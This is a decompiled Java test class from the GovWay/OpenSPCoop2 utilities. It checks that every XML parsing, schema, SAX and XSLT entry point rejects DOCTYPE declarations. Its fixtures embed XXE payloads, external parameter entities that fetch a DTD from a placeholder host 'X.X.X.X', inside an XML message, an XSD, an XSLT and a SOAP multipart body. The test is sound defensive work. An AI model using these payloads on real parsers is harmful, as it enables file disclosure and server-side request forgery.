/*
 * Decompiled with CFR 0.152.
 */
package org.openspcoop2.utils.xml.test;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.InputStream;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Transformer;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamSource;
import javax.xml.validation.Schema;
import javax.xml.validation.SchemaFactory;
import org.openspcoop2.utils.LoggerWrapperFactory;
import org.openspcoop2.utils.resources.FileSystemUtilities;
import org.openspcoop2.utils.xml.ValidatoreXSD;
import org.openspcoop2.utils.xml.XMLUtils;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;

public class TestXXE {
    public static byte[] xmlMessage = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?><!DOCTYPE x [ <!ENTITY\n% test SYSTEM \"http://X.X.X.X/data.dtd\"> %test; ]>\n<root>\n<esempio>TEST</esempio>\n</root>".getBytes();
    public static byte[] xsdSchema = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<!DOCTYPE x [ <!ENTITY\n% test SYSTEM \"http://X.X.X.X/data.dtd\"> %test; ]>\n<xsd:schema xmlns=\"http://www.govway.org/test\"\ntargetNamespace=\"http://www.govway.org/test\"\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" elementFormDefault=\"qualified\"\nattributeFormDefault=\"unqualified\">\n\n<xsd:element name=\"root\">\n        <xsd:complexType>\n                <xsd:sequence>\n                        <xsd:element name=\"test1\" type=\"xsd:string\" maxOccurs=\"unbounded\" minOccurs=\"1\"/>\n                        <xsd:element name=\"test2\" type=\"xsd:string\" maxOccurs=\"1\" minOccurs=\"1\"/>\n                </xsd:sequence>\n        </xsd:complexType>\n</xsd:element>\n</xsd:schema>".getBytes();
    public static byte[] xslt = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<!DOCTYPE x [ <!ENTITY\n% test SYSTEM \"http://X.X.X.X/data.dtd\"> %test; ]>\n<xsl:template match=\"*\">\n    <xsl:element name=\"ns:{local-name()}\" namespace=\"https://example.govway.org\">\n      <xsl:apply-templates select=\"@* | node()\"/>\n    </xsl:element>\n  </xsl:template>".getBytes();
    public static byte[] multipart = "------=_Part_0_6330713.1171639717331\nContent-Type: text/xml; charset=UTF-8\nContent-Transfer-Encoding: binary\nContent-Id: <56D2051AED8F9598BB61721D8C95BA6F>\n\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?><!DOCTYPE x [ <!ENTITY\n% test SYSTEM \"http://X.X.X.X/data.dtd\"> %test; ]>\n<soapenv:Envelope xmlns:soapenv=\"NAMESPACE\"><soapenv:Body>\n<root>\n<test>123</test>\n</root>\n</soapenv:Body></soapenv:Envelope>\n------=_Part_0_6330713.1171639717331\nContent-Type: text/plain; charset=UTF-8\nContent-Transfer-Encoding: binary\nContent-Id: <D559E7E9E29638A15AD37B90FCAEAD53>\n\nHELLO WORLD 1\n\n------=_Part_0_6330713.1171639717331\nContent-Type: text/plain\nContent-Transfer-Encoding: binary\nContent-Id: <FF5ED4B1298A2E36CF986C32638C5257>\n\nHELLO WORLD 2\n\n------=_Part_0_6330713.1171639717331--".getBytes();
    public static String multipart_content_type = "multipart/related;   boundary=\"----=_Part_0_6330713.1171639717331\";   type=\"application/xml\"";

    public static void main(String[] args) throws Exception {
        TestXXE.test();
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    public static void test() throws Exception {
        System.out.println("- newDocument(byte[])");
        try {
            XMLUtils.getInstance().newDocument(xmlMessage);
            throw new Exception("newDocument ok ?");
        }
        catch (Exception e) {
            if (!e.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                throw e;
            }
            System.out.println("\t Eccezione attesa: " + e.getMessage());
            System.out.println("");
            System.out.println("- newDocument(InputStream)");
            try {
                try (ByteArrayInputStream bin = new ByteArrayInputStream(xmlMessage);){
                    XMLUtils.getInstance().newDocument(bin);
                }
                throw new Exception("newDocument ok ?");
            }
            catch (Exception e2) {
                if (!e2.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                    throw e2;
                }
                System.out.println("\t Eccezione attesa: " + e2.getMessage());
                System.out.println("");
                System.out.println("- newDocument(File)");
                File file = File.createTempFile("testXXE", ".xml");
                try {
                    try {
                        FileSystemUtilities.writeFile(file, xmlMessage);
                        XMLUtils.getInstance().newDocument(file);
                        throw new Exception("newDocument ok ?");
                    }
                    catch (Exception e3) {
                        if (!e3.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                            throw e3;
                        }
                        System.out.println("\t Eccezione attesa: " + e3.getMessage());
                        file.delete();
                    }
                }
                catch (Throwable throwable) {
                    file.delete();
                    throw throwable;
                }
                System.out.println("");
                System.out.println("- newDocument(InputSource)");
                try {
                    try (ByteArrayInputStream bin = new ByteArrayInputStream(xmlMessage);){
                        InputSource inputSource = new InputSource(bin);
                        XMLUtils.getInstance().newDocument(inputSource);
                    }
                    throw new Exception("newDocument ok ?");
                }
                catch (Exception e4) {
                    if (!e4.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                        throw e4;
                    }
                    System.out.println("\t Eccezione attesa: " + e4.getMessage());
                    System.out.println("");
                    System.out.println("- newElement(byte[])");
                    try {
                        XMLUtils.getInstance().newElement(xmlMessage);
                        throw new Exception("newElement ok ?");
                    }
                    catch (Exception e5) {
                        if (!e5.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                            throw e5;
                        }
                        System.out.println("\t Eccezione attesa: " + e5.getMessage());
                        System.out.println("");
                        System.out.println("- newElement(InputStream)");
                        try {
                            try (ByteArrayInputStream bin = new ByteArrayInputStream(xmlMessage);){
                                XMLUtils.getInstance().newElement(bin);
                            }
                            throw new Exception("newElement ok ?");
                        }
                        catch (Exception e6) {
                            if (!e6.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                throw e6;
                            }
                            System.out.println("\t Eccezione attesa: " + e6.getMessage());
                            System.out.println("");
                            System.out.println("- newElement(File)");
                            file = File.createTempFile("testXXE", ".xml");
                            try {
                                try {
                                    FileSystemUtilities.writeFile(file, xmlMessage);
                                    XMLUtils.getInstance().newElement(file);
                                    throw new Exception("newElement ok ?");
                                }
                                catch (Exception e7) {
                                    if (!e7.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                        throw e7;
                                    }
                                    System.out.println("\t Eccezione attesa: " + e7.getMessage());
                                    file.delete();
                                }
                            }
                            catch (Throwable throwable) {
                                file.delete();
                                throw throwable;
                            }
                            System.out.println("");
                            System.out.println("- newElement(InputSource)");
                            try {
                                try (ByteArrayInputStream bin = new ByteArrayInputStream(xmlMessage);){
                                    InputSource inputSource = new InputSource(bin);
                                    XMLUtils.getInstance().newElement(inputSource);
                                }
                                throw new Exception("newElement ok ?");
                            }
                            catch (Exception e8) {
                                if (!e8.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                    throw e8;
                                }
                                System.out.println("\t Eccezione attesa: " + e8.getMessage());
                                System.out.println("");
                                System.out.println("- getSAXParserFactory usage");
                                try {
                                    SAXParserFactory saxFactory = XMLUtils.getInstance().getSAXParserFactory();
                                    saxFactory.setNamespaceAware(true);
                                    SAXParser saxParser = saxFactory.newSAXParser();
                                    XMLReader xmlReader = saxParser.getXMLReader();
                                    try (ByteArrayInputStream bin = new ByteArrayInputStream(xmlMessage);){
                                        InputSource inputSource = new InputSource(bin);
                                        xmlReader.parse(inputSource);
                                    }
                                    throw new Exception("getSAXParserFactory usage ok ?");
                                }
                                catch (Exception e9) {
                                    if (!e9.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                        throw e9;
                                    }
                                    System.out.println("\t Eccezione attesa: " + e9.getMessage());
                                    System.out.println("");
                                    System.out.println("- getSchemaFactory usage");
                                    try {
                                        try (ByteArrayInputStream bin = new ByteArrayInputStream(xsdSchema);){
                                            StreamSource streamSource = new StreamSource(bin);
                                            SchemaFactory factory = XMLUtils.getInstance().getSchemaFactory();
                                            Schema schema = factory.newSchema(streamSource);
                                        }
                                        throw new Exception("getSchemaFactory usage ok ?");
                                    }
                                    catch (Exception e10) {
                                        if (!e10.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                            throw e10;
                                        }
                                        System.out.println("\t Eccezione attesa: " + e10.getMessage());
                                        System.out.println("");
                                        System.out.println("- ValidatoreXSD usage (schemaFactory)");
                                        try {
                                            try (ByteArrayInputStream bin = new ByteArrayInputStream(xsdSchema);){
                                                ValidatoreXSD streamSource = new ValidatoreXSD(LoggerWrapperFactory.getLogger(TestXXE.class), "org.apache.xerces.jaxp.validation.XMLSchemaFactory", (InputStream)bin);
                                            }
                                            throw new Exception("ValidatoreXSD usage ok ?");
                                        }
                                        catch (Exception e11) {
                                            if (!e11.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                                throw e11;
                                            }
                                            System.out.println("\t Eccezione attesa: " + e11.getMessage());
                                            System.out.println("");
                                            System.out.println("- ValidatoreXSD usage");
                                            try {
                                                try (ByteArrayInputStream bin = new ByteArrayInputStream(xsdSchema);){
                                                    ValidatoreXSD streamSource = new ValidatoreXSD(LoggerWrapperFactory.getLogger(TestXXE.class), (InputStream)bin);
                                                }
                                                throw new Exception("ValidatoreXSD usage ok ?");
                                            }
                                            catch (Exception e12) {
                                                if (!e12.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                                    throw e12;
                                                }
                                                System.out.println("\t Eccezione attesa: " + e12.getMessage());
                                                System.out.println("");
                                                System.out.println("- ValidatoreXSD usage (multipleIS + schemaFactory)");
                                                try {
                                                    try (ByteArrayInputStream bin = new ByteArrayInputStream(xsdSchema);){
                                                        ValidatoreXSD streamSource = new ValidatoreXSD(LoggerWrapperFactory.getLogger(TestXXE.class), "org.apache.xerces.jaxp.validation.XMLSchemaFactory", bin, bin, bin, bin);
                                                    }
                                                    throw new Exception("ValidatoreXSD usage ok ?");
                                                }
                                                catch (Exception e13) {
                                                    if (!e13.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                                        throw e13;
                                                    }
                                                    System.out.println("\t Eccezione attesa: " + e13.getMessage());
                                                    System.out.println("");
                                                    System.out.println("- ValidatoreXSD usage (multipleIS)");
                                                    try {
                                                        try (ByteArrayInputStream bin = new ByteArrayInputStream(xsdSchema);){
                                                            ValidatoreXSD streamSource = new ValidatoreXSD(LoggerWrapperFactory.getLogger(TestXXE.class), bin, bin, bin, bin);
                                                        }
                                                        throw new Exception("ValidatoreXSD usage ok ?");
                                                    }
                                                    catch (Exception e14) {
                                                        if (!e14.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                                            throw e14;
                                                        }
                                                        System.out.println("\t Eccezione attesa: " + e14.getMessage());
                                                        System.out.println("");
                                                        System.out.println("- getTransformerFactory usage");
                                                        try {
                                                            try (ByteArrayInputStream bin = new ByteArrayInputStream(xslt);){
                                                                DOMSource xsltSource = new DOMSource(XMLUtils.getInstance().newElement(xslt));
                                                                Transformer transformer = XMLUtils.getInstance().getTransformerFactory().newTransformer(xsltSource);
                                                            }
                                                            throw new Exception("getTransformerFactory usage ok ?");
                                                        }
                                                        catch (Exception e15) {
                                                            if (!e15.getMessage().contains("DOCTYPE is disallowed when the feature \"http://apache.org/xml/features/disallow-doctype-decl\" set to true")) {
                                                                throw e15;
                                                            }
                                                            System.out.println("\t Eccezione attesa: " + e15.getMessage());
                                                            return;
                                                        }
                                                    }
                                                }
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

